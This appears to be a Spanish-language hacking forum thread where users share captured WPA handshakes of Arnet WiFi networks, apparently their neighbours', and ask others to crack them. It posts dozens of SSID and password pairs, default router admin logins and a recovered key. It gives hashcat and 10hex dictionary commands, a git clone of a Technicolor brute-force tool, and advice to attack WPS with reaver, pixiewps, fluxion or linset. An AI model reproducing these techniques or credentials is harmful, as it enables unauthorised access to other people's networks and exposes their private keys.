Router: MitraStar   
Modelo MitraStar Wireless Access Point RT3593 (Nro de serie: 12345678)
* Saque el PIN (17857765) con PixieScript de Wifislax, pero no me conecta.
http://www.mediafire.com/file/sehsqwjnrv5otsj/WiFi-Arnet-56yj_%281C-74-0D-1B-3F-B0%29.cap

Nombre: WiFi-Arnet-kyet
BSSID: A0:1B:29:3A:3E:8C
Seguridad: WPA2
Router: SAGEMCOM (Broadcom)
Modelo: Broadcom
http://www.mediafire.com/file/92zi6l84lmmncbm/WiFi-Arnet-kyet_%28A0-1B-29-3A-3E-8C%29.cap

Nombre: WiFi-Arnet-C0C2E5
BSSID: 30:91:8F:C0:C2:E5
Seguridad: WPA2
Router: Technicolor
Modelo: MediaAccess TG 588V (Nro de serie: 1511CZ5C5)
http://www.mediafire.com/file/n98dh7aydxdumzj/WiFi-Arnet-C0C2E5-30-91-8F-C0-C2-E5.cap

- Si tienen algun error para descargar me avisan. Saludos! Y gracias de antemano.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: daniel0600 en 05 de Marzo de 2017, 01:59:22 PM
Hola gente buenas tardes de nuevo tengo un hand.

Nombre: WiFi-Arnet-C7BD51
BSSID: C4:EA:1D:C7:BD:51
Seguridad: WPA2
Router: Technicolor
Modelo: MediaAccess TG582n v2

Ya probe con todos los programas wifislax para wps, y el router se bloquea.
Asi que me decidi de hacerle un brute-force, teniendo en cuenta algunos datos que es la contraseña
es HEXA de 10 caractares. pero se hace eterno el proceso.
¿Alguna idea de como reducir el tiempo del proceso?¿O si tienen algun dato mas de estos router vdsl?

(http://thumbs.subefotos.com/19c2af464d589af48646225c054a4924o.jpg) (http://subefotos.com/ver/?19c2af464d589af48646225c054a4924o.jpg)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: hydra en 19 de Marzo de 2017, 07:11:41 PM
You are not allowed to view links. Register or Login
Detalle técnico, los TP-Link tienen el WPS como la WPA, osea todos numero, captura un hand y le paso el dic haber que onda.

Esa es una cuestión que no la sabía, justo si me permite, me gustaría consultarle maestro :D.

O sea, que si capturo el cap de un wps activo ¿puedo pasarle un diccionario que contenga todas las combinaciones de pines y sale el pin?                                                                                                       ¿o se trata de otro metodo? Ya que de ser posible la idea de poder sacar el cap y pasarle lo de un diccionaro wps me gusta, evitando así que se active el bloqueo del mismo router.

Corríjame y/o orienteme sí es posible, dado que fue una idea que se me cruzo por la cabeza al leerlo :)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: maxionline en 23 de Marzo de 2017, 06:40:36 PM
You are not allowed to view links. Register or Login
Esa es una cuestión que no la sabía, justo si me permite, me gustaría consultarle maestro :D.

O sea, que si capturo el cap de un wps activo ¿puedo pasarle un diccionario que contenga todas las combinaciones de pines y sale el pin?                                                                                                       ¿o se trata de otro metodo? Ya que de ser posible la idea de poder sacar el cap y pasarle lo de un diccionaro wps me gusta, evitando así que se active el bloqueo del mismo router.

Corríjame y/o orienteme sí es posible, dado que fue una idea que se me cruzo por la cabeza al leerlo :)

Segun sé. el WPS es un ataque al pin de autoconfiguracion, distinto completamente a los handshakes capturados. Con los handshakes (name.cap) por diccionario o fuerza bruta se puede sacar el wireless key, pero nada que ver con el pin de wps.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: hydra en 24 de Marzo de 2017, 12:05:50 AM
You are not allowed to view links. Register or Login
Segun sé. el WPS es un ataque al pin de autoconfiguracion, distinto completamente a los handshakes capturados. Con los handshakes (name.cap) por diccionario o fuerza bruta se puede sacar el wireless key, pero nada que ver con el pin de wps.

Le agradezco desde ya la respuesta y la aclaración compadre. La verdad es que es una pena, dado que de funcionar, habría sido más lento, pero seguro de sacar un pin, evitando así el bloqueo :(.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: maxionline en 26 de Marzo de 2017, 10:40:47 PM
Puse mis sucias manos sobre un modem de los que creo que son los nuevos de Arnet WiFi-Arnet-XXXXXX
, TG582n V2, saqué una foto que salio mas o menos pero se lee lo importante, la pego acá a ver si a alguien le sirve para idear algún patrón de wps o de la clave wireless.

(http://i.imgur.com/hS2z5Kk.jpg)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: kitt2000 en 28 de Marzo de 2017, 11:07:20 AM
Hola a todos... la verdad que esta muy buena la colaboracion de todos en este tema.... no se si será el lugar correcto para postearlo, pero...

Alguien se puso a comparar las posibilidades de diferentes soluciones para busqueda de contraseñas para trabajar de manera distribuida?... Hay soluciones forenses que soportan computacion distribuida para buscar claves en múltiples formatos, pero no he visto que apliquen a busqueda de contraseñas en redes wireless.

Por esto se me ocurre que por ahi podriamos armar una red entre las pcs que tenemos entre todos para busqueda de contraseñas con fines colaborativos para realizar investigaciones, ya que la union hace la fuerza... por ejemplo, esta red vendría genial para colaborar en confirmar/refutar teorías en este post...

El tema es que hasta el momento he buscado soluciones que hagan esto pero no encontré nada... y es muy probable que ya exista... Que les parece la idea?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: maxifor en 19 de Abril de 2017, 04:25:54 PM
Estimados, los saludo de antemano y les comento que soy nuevo en este tema del wifislax, pude sacar unas Handshake de Arnet, si alguno me da una mano con las claves me hace un enorme favor.

SSID:WiFi-Arnet-i5ch
BSSID:98:DE:D0:E4:0C:8E
MANUFACTURER: TP-LINK TECHNOLOGIES CO
CHAN:3
WPA2-PSK + WPS
https://www.dropbox.com/s/etv0eb0hb7ebox5/WiFi-Arnet-i5ch%20%2860-31-97-35-51-24%29.cap?dl=0

SSID:WiFi-Arnet-3xct
BSSID:86:F1:FF:B4:9B:35
MANUFACTURER: ?????
CHAN:1
WPA-PSK
https://www.dropbox.com/s/kyelmq3jkp5s5tp/WiFi-Arnet-3xct%20%2886-F1-FF-B4-9B-35%29.cap?dl=0
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diegobenti en 20 de Mayo de 2017, 12:59:14 AM
WiFi-Arnet-T08z   38-4b-50-39-25-7f   WPA-PSK   CCMP      
Como estan gente aver si me ayudan con esta red, saben si se puede sacar algo ? saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: zafiro en 16 de Julio de 2017, 04:27:29 PM
Hola, soy aficionado y no un experto. Estoy intentando someter a prueba la hipótesis de que las claves originales de Arnet se componen de una combinación de de letras mayúsculas y números con extensión mímima y máxima de diez componentes.

Estoy utilizando el programa AIRGEDON que forma parte de WIFISLAX. Me ha resultado sencillo montar el programa y ponerlo a funcionar... PERO...

Lleva 25 horas dedicadas en exclusiva en una notebook de la cual puedo prescindir y que está trabajando a razón de entre 1250 y 140 k/s...

En 25 horas lleva examinadas 110 millones de combinaciones.... PERO...

Multitud de esas combinaciones efectuadas SON INÚTILES E IMPOSIBLES...

De hecho en éste momento va por AAAAB3---- (los últimos cuatro términos vuelan)...

Es posible que los autores del programa hayan corregido los cálculos inútiles y yo a no haber actualizado el programa esté haciendo trabajar la notebook en vano por días y días...

Existen MILLONES DE COMBINACIONES IMPOSIBLES que mi máquina está examinando en éste momento... por ejemplo uno puede suponer que ninguna clave se compondrá de una misma letrao un mísmo número repetido tres veces en forma seguida (AAABCD3339 POR CITAR UNO DE MILLONES DE EJEMPLOS)...

Estoy decidiendo abortar porque esa deficiencia la juzgo determinante para no seguir adelante.

El Handshake del router que estoy tratando develar: https://drive.google.com/file/d/0B1biWM6neInlMU41M254WmNSNDA/view?usp=sharing
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: zafiro en 16 de Julio de 2017, 04:29:57 PM
Quise decir "entre 1250 y 1450 k/s"
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diego10 en 16 de Julio de 2017, 06:24:45 PM
es la poca velocidad de proceso lo que te tendria que hacer desistir
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: ciccio2 en 30 de Agosto de 2017, 09:54:28 AM
hi , sorry for the english, but i think you will understand better me if i talk in this language cause google translate sometimes fails.

i have a net with ADB BROADBAND ITALIA router :

MAC : F0:84:2F:48:98:02
SSID : FASTWEB-1-cM35gKIJqIYV

i tried with your script but the password was not correct. Could i do something else? The passwords seem very near, cause it's 10 characters here as wifi arnet-XXXX

waiting for your answer
Best regards
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Yoshitoshi en 08 de Septiembre de 2017, 07:54:34 PM
Hola, soy de Córdoba (Argentina). Tengo este handshake de Arnet (WiFi-Arnet-EF74) (A4:5D:A1:65:EF:75). Agradezco si me pueden dar una mano. Prometo un Fernet y Alfajores al que me ayude.

Link del HandShake: https://www.sendspace.com/file/93y9xq
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: juani_peiro en 17 de Septiembre de 2017, 12:39:28 AM
(https://www.mediafire.com/file/wq40q3jbvggd0aj/IMG_20170906_120232663.jpg)Adjunto una foto de un modem huawei de arnet al que pude tomarle los datos y la pass en una visita a un domicilio, como no pude subirla como mensaje no se si va a aparecer, de todas formas dejo el link, ojala sirva como aporte. Saludos!

https://www.mediafire.com/file/wq40q3jbvggd0aj/IMG_20170906_120232663.jpg
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Teno en 10 de Octubre de 2017, 10:29:29 PM
Como es el tema de la complejidad de los diccionarios para Arnet? Porque me cansé de tirarle con todo a esto! Necesito una GPU ya!!!

https://mega.nz/#!ltR3mLQL!hmROdzXB5VIe2u-auk1niyqSBzBNLP8gKx0kEFewyfM

WiFi-Arnet-43287B C4:EA:1D:43:28:7B

Gracias a todos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Teno en 11 de Octubre de 2017, 07:58:05 AM
Voy a probar, tengo el AP a pocos metros!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: ggbitton en 11 de Octubre de 2017, 10:13:33 PM
Buenas noches.! me podrían dar una mano con estas dos redes  :-X

https://drive.google.com/file/d/0B38JdnSTarNUUm5LbkdjUmRtWlE/view?usp=sharing

https://drive.google.com/file/d/0B38JdnSTarNUaEFsWnRBUWxSMDQ/view?usp=sharing
https://drive.google.com/file/d/0B38JdnSTarNURjMyNTV6aFQ5U00/view?usp=sharing

Muchas gracias.!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: ladrondemochilas en 15 de Noviembre de 2017, 03:25:54 PM
Dejo una lista de contraseñas de wifi arnet si sirve de algo para analizar patrones, lo que tienen en comun a simple vista es que son contraseñas de longitud 13

SSID:         "WiFi-Arnet-02x5"
psk:          "l3ehlk3KgXPfk"
Key MGMT:     WPA-PSK
#160:
SSID:         "WiFi-Arnet-02x5"
psk:          "l3ehlk3KgXPfk"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#161:
SSID:         "WiFi-Arnet-1eeh"
psk:          "faXNeR37gc33i"
Key MGMT:     WPA-PSK
#162:
SSID:         "WiFi-Arnet-208v"
psk:          "3gjXVa4gCEblk"
Key MGMT:     WPA-PSK
#163:
SSID:         "WiFi-Arnet-208v"
psk:          "3gjXVa4gCEblk"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#164:
SSID:         "WiFi-Arnet-24w2"
psk:          "Xw74vw49A39zT"
Key MGMT:     WPA-PSK
#165:
SSID:         "WiFi-Arnet-26tr"
psk:          "9hlbdejmk3H7m"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#166:
SSID:         "WiFi-Arnet-32E9"
psk:          "9PfjwGw0hz"
Key MGMT:     WPA-PSK
#167:
SSID:         "WiFi-Arnet-44i5"
psk:          "NRk3wroXWqFp4"
Key MGMT:     WPA-PSK
#168:
SSID:         "WiFi-Arnet-44i5"
psk:          "NRk3wroXWqFp4"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#169:
SSID:         "WiFi-Arnet-6ko6"
psk:          "4nf7l3lfnFd3R"
Key MGMT:     WPA-PSK
#170:
SSID:         "WiFi-Arnet-7k05"
psk:          "H94zVKJ3FW43C"
Key MGMT:     WPA-PSK
#171:
SSID:         "WiFi-Arnet-7k05"
psk:          "H94zVKJ3FW43C"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#172:
SSID:         "WiFi-Arnet-8001"
psk:          "iVfb4eEhm494n"
Key MGMT:     WPA-PSK
#173:
SSID:         "WiFi-Arnet-8001"
psk:          "iVfb4eEhm494n"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#174:
SSID:         "WiFi-Arnet-98m5"
psk:          "fspijofrlqYhs"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#175:
SSID:         "Wifi-Arnet-9k4j"
psk:          "X9VnoKR7a4W77"
Key MGMT:     WPA-PSK
#176:
SSID:         "WiFi-Arnet-9wt3"
psk:          "7CTACVEUEKE3J"
Key MGMT:     WPA-PSK
#177:
SSID:         "WiFi-Arnet-9wt3"
psk:          "7CTACVEUEKE3J"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#178:
SSID:         "WiFi-Arnet-b546"
psk:          "jor2015lina"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#179:
SSID:         "WiFi-Arnet-b7ky"
psk:          "mvv7PFh4Th"
Key MGMT:     WPA-PSK
#180:
SSID:         "WiFi-Arnet-C3375B"
psk:          "0AC146FA19"
Key MGMT:     WPA-PSK
#181:
SSID:         "WiFi-Arnet-clc7"
psk:          "7w9A9NJ7EC4V3"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#182:
SSID:         "WiFi-Arnet-cx8b"
psk:          "3A3N37J47ETM3"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#183:
SSID:         "WiFi-Arnet-dj8t"
psk:          "l374NRK4dq779"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#184:
SSID:         "WiFi-Arnet-jlrj"
psk:          "P4WdWRcUXV3CP"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#185:
SSID:         "WiFi-Arnet-lre3"
psk:          "lxs949W3vTTu3"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#186:
SSID:         "WiFi-Arnet-nh76"
psk:          "3HHxJE3JMA34N"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#187:
SSID:         "WiFi-Arnet-qcee"
psk:          "tcj437kthc"
Key MGMT:     WPA-PSK
#188:
SSID:         "WiFi-Arnet-u1o9"
psk:          "e4Ve34jea9bdb"
Key MGMT:     WPA-PSK
#189:
SSID:         "WiFi-Arnet-v9et"
psk:          "Y9PY34H34P3F3"
Key MGMT:     WPA-PSK
#190:
SSID:         "WiFi-Arnet-v9et"
psk:          "Y9PY34H34P3F3"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#191:
SSID:         "WiFi-Arnet-yda2"
psk:          "344zvFXMXzEFx"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#192:
SSID:         "WiFi-Arnet-zhc6"
psk:          "3UxmkHR9KkJtp"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 19 de Noviembre de 2017, 08:58:53 AM
Gracias por compartir ladrondemochilas.;)

El tema es romper via diccionario llevaría una eternidad mientras fritás la VGA o CPU.
La única que te queda es atacar WPS si lo tienen activo vía bully o reaver rogando que sean vulnerables o con mucha suerte vía linset/fluxion/wifimosys si el novato que está del otro lado es capaz de poner la pass wifi.
Arnet la hizo bien difícil.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Supehache en 25 de Noviembre de 2017, 12:37:34 AM
Hola Gente, 
me aparecio una red nueva por la zona, urgutee un poco y la saqué por WPS con reaver.
obviamente es de arnet  y aqui van los datos

MODEM VDSL
MODELO VR9517VAC22-A-OS-AM

con MAC E4:BE:ED:XX:XX:XX

SSID WiFi-Arnet-cw8e-5G , la de 2.4G estaba cambiada


Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Supehache en 25 de Noviembre de 2017, 01:37:09 AM
Hola otra vez!! :P

Crackee una Arnet de los Technicolor TG588v , esas con mac
C4:EA:1D:XX:XX:XX
que tienen clave Hexa de 10 Dígitos

tengo 60 KHash/s, toda la combinación me llevaría casi 230 días las 24hs del día! Imposible,
se me funde el GPU! :P
Escribo esto solo para contar mi experiencia, y tomenlo como metodo experimental,
a ver si alguien se atreve a repetirlo, con alguna super máquina,
ya que demora mucho tiempo y no creo q lo vuelva a repetir.
así que no me anden pidiendo que les busque la clave! jeje

La cosa es que usando un generador de nros Hexa saqué la clave en unos 40 días ,

sí, lo sé,
sigue siendo mucho tiempo, aunque solo dejaba corriendo el hashcat  por las noches unas 8 horas y cuando me acordaba.

La idea de intentarlo empezó cuando tras recopilar algunos patrones de claves, me doy cuenta ( y es lo que creo), que los números de la clave WPA en hexa van creciendo secuencialmente a medida q salen nuevos modem.
Tuve uno nuevo en la mano por 1 semana, su clave empezaba con 4 (solo tenia 5 claves y todas empezaabn con 1,2o3, por eso deduzco que es secuencial) y no pude vulnerarlo de ninguna forma, ni firmware, ni WPS, nada.

Por otro lado hace rato que tenia este soft

https://github.com/wpatoolkit/10-Hex-Generator (https://github.com/wpatoolkit/10-Hex-Generator)

es una utilidad para generar diccionarios en Hexa llamada 10hex, pero con modificadores para reducirlo en tamaño , elimininando combinaciones pocos probables,

así que si pienso que el primer dígito es del 1 al 4, solo tengo que hacer un diccionario de
1 nro fijo + 9 variables en hexa , a lo sumo armo 4 diccionarios y los voy probando.

Para empezar Entonces cree un diccionario con esta línea

10hex.exe  -startswith2 –upper    -x7    –risky     >    g:\h2.txt

para generar un diccionario que empiece con el nro 2 (el mas repetido de las claves q encontré) + los 9 hexas y en mayúsculas. por ejemplo  2BE3614C57

-x7 es almenos 7 caracteres distintos,

Me ocupó menos de la mitad casi 300gb, por un archivo con todas las combinaciones de 1+9 hexa serían unos 640gb, esto es por cada uno de los nros q yo vaya eligiendo.
estem,  y si,  ovbio, ahora solo había que tener lugar en algún disco y tiempo :P

creo se puede hacer en modo piping, y usar la opción --session con el hashcat para no perder el progreso.

probé empezando con el nro 2 y luego el 4 pero  sin suerte
pero al empezar con el nro 3, saliooo!!! si señores!!


WiFi-Arnet-4A57F2:c4ea1d4a57f2:7840e43cb13e:32A8E5B721


por las dudas el manejo de session del hashcat las hice con estas líneas


hashcat64.exe -m 2500 arnet.hccap g:\h2.txt  --session hexa2

y para resumir

hashcat64.exe  --session hexa2 --restore


saludos


Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 30 de Noviembre de 2017, 06:51:24 PM
Encontré algo por si alguno tiene ganas de probar.
technicolor_bruteforce
git clone https://github.com/emanueleforestieri/technicolor_bruteforce.git
cd technicolor_bruteforce
gcc main.c -std=c99 -O3
./a.out

no lo probé a full porque no me da el cuero, pero lo pongo igual porque estamos en bolas con los modems VDSL de arnet de todas maneras.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: virgo_ssj2 en 11 de Enero de 2018, 05:41:40 PM
Hacé poco me enviaron un modem nuevo Arnet del que no encontre data, un Zyxel VMG1925-T20K con 2 AP's, una 2.4Ghz y la otra 5Ghz.

Datos:
AP: WiFi-Arnet-whw8-2.4 o WiFi-Arnet-whw8-5
MAC: F4:B7:E2:D2:13:B1
PASSWORD: bMWdUVVNPT (raro, esperaba algún número)
Red que genera el DHCP: 192.168.1.0/24

Aprovecho para preguntar si alguien tiene el USER y PASSWORD para entrarle como administrador? o me puede decir en la sección en que debería preguntar por eso?

Saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: carlosornella en 15 de Enero de 2018, 11:57:40 AM



Estoy en la misma que vos, encontraste la password?
Gracias
You are not allowed to view links. Register or Login
Hacé poco me enviaron un modem nuevo Arnet del que no encontre data, un Zyxel VMG1925-T20K con 2 AP's, una 2.4Ghz y la otra 5Ghz.

Datos:
AP: WiFi-Arnet-whw8-2.4 o WiFi-Arnet-whw8-5
MAC: F4:B7:E2:D2:13:B1
PASSWORD: bMWdUVVNPT (raro, esperaba algún número)
Red que genera el DHCP: 192.168.1.0/24

Aprovecho para preguntar si alguien tiene el USER y PASSWORD para entrarle como administrador? o me puede decir en la sección en que debería preguntar por eso?

Saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: maxisanchez en 15 de Enero de 2018, 05:57:32 PM
Posibles Puertas de enlace:

http://10.0.0.2/admin.html.
http://192.168.0.1/admin.html
http://192.168.1.1/admin.html
http://192.168.1.254/admin.html

Posibles Claves:

Usuario: admin
Clave: trendchip

Usuario: admin
Clave: tomenague

Usuario: admin
Clave: alvlgeddl

Usuario: admin
Clave: CalVxePV1!

Usuario: admin
Password: Fscltsltyn1ddl!

Si es Arnet en teoría debería ser alguna de estas salvo que el usuario la haya modificado. El problema es que últimamente las vienen configurando para que solo se pueda acceder a la Puerta de enlace solo si se conectan desde el cable Ethernet y no desde wifi.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: carlosornella en 16 de Enero de 2018, 10:30:52 PM
You are not allowed to view links. Register or Login
Posibles Puertas de enlace:

http://10.0.0.2/admin.html.
http://192.168.0.1/admin.html
http://192.168.1.1/admin.html
http://192.168.1.254/admin.html

Posibles Claves:

Usuario: admin
Clave: trendchip

Usuario: admin
Clave: tomenague

Usuario: admin
Clave: alvlgeddl

Usuario: admin
Clave: CalVxePV1!

Usuario: admin
Password: Fscltsltyn1ddl!

Si es Arnet en teoría debería ser alguna de estas salvo que el usuario la haya modificado. El problema es que últimamente las vienen configurando para que solo se pueda acceder a la Puerta de enlace solo si se conectan desde el cable Ethernet y no desde wifi.

Muchas gracias por tu ayuda
NO es ninguna de esas claves, em modem lo saqué yo de la caja original.
LLame a TELECOM, no conocen el modem
Chatié con la gente de ZYXEL y tampoco pueden ayudarme, ya que TELECOM les pone un FIRMWARE propietario
Lo mas loco? NO ESTÁ en la página de ZYXEL listado, este modelo NO EXISTE en ningún lado
VMG1925-t20k

Lo bueno es que esa marca es la mejor para el abonado, funciona muy bien, y ZYXEL saca firmwares corrigiendo errores MUY SEGUIDO, de lojos, el mejor equipo.

Sigo buscando y gracias de nuevo


Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: carlosornella en 23 de Enero de 2018, 09:20:47 AM
con respecto al modem VMG1925-T20K, no puede usarse el Firefox ni el Google Chrome para acceder, solo se puede con el Internet Explorer

No hace falta estar conectado por cable como dicen mas arriba, se accede por WIFI tranquilamente, y viendo los modems de Telecom, hasta ahora no encontré ninguno que limite el acceso por inhalámbrico.

Si alguien conoce un modem que limite ese acceso, por favor poner marca y modelo aqui

Muchas gracias
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 25 de Enero de 2018, 11:03:27 AM
Les pido un favor a los users de ARNET con VDSL.

Si no tienen PIN habilitado en la web config, habilitenlo.
Y después mandenme un PM para que les muestre como obtener un interesante log con reaver.

Sería realmente de mucha ayuda para todos y los que hacen reaver/pixiewps tener data sobre los datos que arrojan frente a ataques por pin.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diferentesvil en 26 de Enero de 2018, 10:48:54 PM
You are not allowed to view links. Register or Login
Hacé poco me enviaron un modem nuevo Arnet del que no encontre data, un Zyxel VMG1925-T20K con 2 AP's, una 2.4Ghz y la otra 5Ghz.

Datos:
AP: WiFi-Arnet-whw8-2.4 o WiFi-Arnet-whw8-5
MAC: F4:B7:E2:D2:13:B1
PASSWORD: bMWdUVVNPT (raro, esperaba algún número)
Red que genera el DHCP: 192.168.1.0/24

Aprovecho para preguntar si alguien tiene el USER y PASSWORD para entrarle como administrador? o me puede decir en la sección en que debería preguntar por eso?

Saludos

tengo un Zyxel VMG1925-T20K cerca con que sacaste la pass?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: carlosornella en 28 de Enero de 2018, 10:31:19 AM
You are not allowed to view links. Register or Login
tengo un Zyxel VMG1925-T20K cerca con que sacaste la pass?

Lee bien, el modem es de el.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Rabufetti en 01 de Febrero de 2018, 11:20:56 PM
Mismo problema con un router mediaaccess tg588v con wps activado pero imposible de sacar el pin.

Ya que estoy pregunto, arnet solo entrega esos routers a abonados que soporten tecnologia vDSL de alta velocidad? , porque por donde vivo estamos todos con conexiones ADSL bajas.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: rodo182 en 05 de Febrero de 2018, 08:23:34 PM
Por lo que leido entonce es casi imposible sacar Arnet por Diccionario ??
que bajon

Me voy a poner las pilas a ver si la consigo de alguna manera

Mientras tanto dejo una....  a ver si alguien tiene suerte   ;)
Saludos

WiFi-Arnet-e7b5 (EC-43-F6-B3-24-FF)
http://www.mediafire.com/file/imlvcymyrdybuvj/WiFi-Arnet-e7b5%20%28EC-43-F6-B3-24-FF%29.cap
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 06 de Febrero de 2018, 06:27:11 PM
no la vas a sacar por diccionario

solo por ataque con fuerza bruta con reaver si usa pin y mas rapido si es vulnerable a pixiewps
o la podes sacar con suerte usando wifimosys o fluxion
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: jordán80 en 10 de Febrero de 2018, 12:06:07 AM
Ayuda por favor! Arnet , que era maravillosamente vulnerable, esta cambiando los modems...de 4 que tenía, me queda una sola y con señal debil.


al que me ayude con la clave, le prometo regalos de todo tipo, y cuando digo a todo, .....me refiero a TODO 

https://mega.nz/#!l8llwL5I!cDTfuygI2bmEwaht4im5IlKuyL0wPFNT7YHzt_u479s


WiFi-Arnet-C43DCD
C4:EA:1D:C4:3D:CD
ch 6
WPA2_PSK,TKIP+AES
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 13 de Febrero de 2018, 09:10:30 AM
You are not allowed to view links. Register or Login
Por lo que leido entonce es casi imposible sacar Arnet por Diccionario ??
que bajon

Me voy a poner las pilas a ver si la consigo de alguna manera

Mientras tanto dejo una....  a ver si alguien tiene suerte   ;)
Saludos

WiFi-Arnet-e7b5 (EC-43-F6-B3-24-FF)
http://www.mediafire.com/file/imlvcymyrdybuvj/WiFi-Arnet-e7b5%20%28EC-43-F6-B3-24-FF%29.cap

Buen Martes 13.
La contraseña que necesitas es: E07BF05FSC. La saqué en dos horas y cuarenta y tres minutos en una netbook del gobierno a 699.90 claves por segundo.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: rodo182 en 19 de Febrero de 2018, 07:43:35 AM
You are not allowed to view links. Register or Login
Buen Martes 13.
La contraseña que necesitas es: E07BF05FSC. La saqué en dos horas y cuarenta y tres minutos en una netbook del gobierno a 699.90 claves por segundo.

Genio!   :)
A mi me llevo 2 horas solo el handshake :(
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: n0b0dy en 22 de Febrero de 2018, 05:08:00 PM
se que llego tarde pero si el modem es un Zytel el patron es AxBCxxDxxx, es decir si tu BSSID: WiFi-Arnet-e7b5 entonces la clave WPA es Ex7Bxx5xxx (con mayusculas) y generalmente es un numero hexadecimal, lo que me parece raro es que tu clave era E07BF05FSC me parecio raro eso.

PD: la info saque de un foro de aca http://arg-wireless.com.ar/index.php?topic=1377.msg13646#msg13646
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: R4z0r en 22 de Febrero de 2018, 07:18:05 PM
You are not allowed to view links. Register or Login
se que llego tarde pero si el modem es un Zytel el patron es AxBCxxDxxx, es decir si tu BSSID: WiFi-Arnet-e7b5 entonces la clave WPA es Ex7Bxx5xxx (con mayusculas) y generalmente es un numero hexadecimal, lo que me parece raro es que tu clave era E07BF05FSC me parecio raro eso.

PD: la info saque de un foro de aca http://arg-wireless.com.ar/index.php?topic=1377.msg13646#msg13646
Error de tipeo de Kory, en realidad es un "5" no una "S". Las claves de estos ZyXEL son siempre hexadecimales de 10 dígitos.
(http://oi67.tinypic.com/211s6qp.jpg)

Salu2!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 26 de Febrero de 2018, 01:40:20 PM
You are not allowed to view links. Register or Login
se que llego tarde pero si el modem es un Zytel el patron es AxBCxxDxxx, es decir si tu BSSID: WiFi-Arnet-e7b5 entonces la clave WPA es Ex7Bxx5xxx (con mayusculas) y generalmente es un numero hexadecimal, lo que me parece raro es que tu clave era E07BF05FSC me parecio raro eso.

PD: la info saque de un foro de aca http://arg-wireless.com.ar/index.php?topic=1377.msg13646#msg13646

No llegaste tarde; sí, el patrón de la contraseña se basa en la dirección MAC. Tu aporte ya está ayudando a otros.
¡Gracias!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 26 de Febrero de 2018, 01:43:39 PM
You are not allowed to view links. Register or Login
Error de tipeo de Kory, en realidad es un "5" no una "S". Las claves de estos ZyXEL son siempre hexadecimales de 10 dígitos.
(http://oi67.tinypic.com/211s6qp.jpg)

Salu2!

"Error" voluntario para ver quién lo notaba, y deducir quién se tomó todo el trabajo de leer todas las páginas del Tema.
¡Muchas gracias por tu cita que nos ayuda a todos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Yoshitoshi en 02 de Marzo de 2018, 07:58:45 PM
Sé que las de Arnet son difíciles, les dejo un handshake por si alguno puede hacer algo. Como dato les puedo decir que la conexión es nuevita, no tiene más de 2 meses. Abrazos desde Córdoba.

WiFi-Arnet-qd9m-2.4G (A0-F4-79-89-81-E0).cap

https://www.sendspace.com/file/u4u4ja

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: lalolanda en 06 de Marzo de 2018, 10:55:07 AM
Hola queria saber is me podian ayudar con este, no tengo buen poder de calculo

https://www.dropbox.com/s/wgosyg0h3wdvny2/hs-E4-BE-ED-C8-DA-1B.cap?dl=0

Gracias!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 08 de Marzo de 2018, 06:02:03 PM
Comprobá si la red WiFi-Arnet-jkb9 tiene activado el WPS, y atacá por Pixie Script.
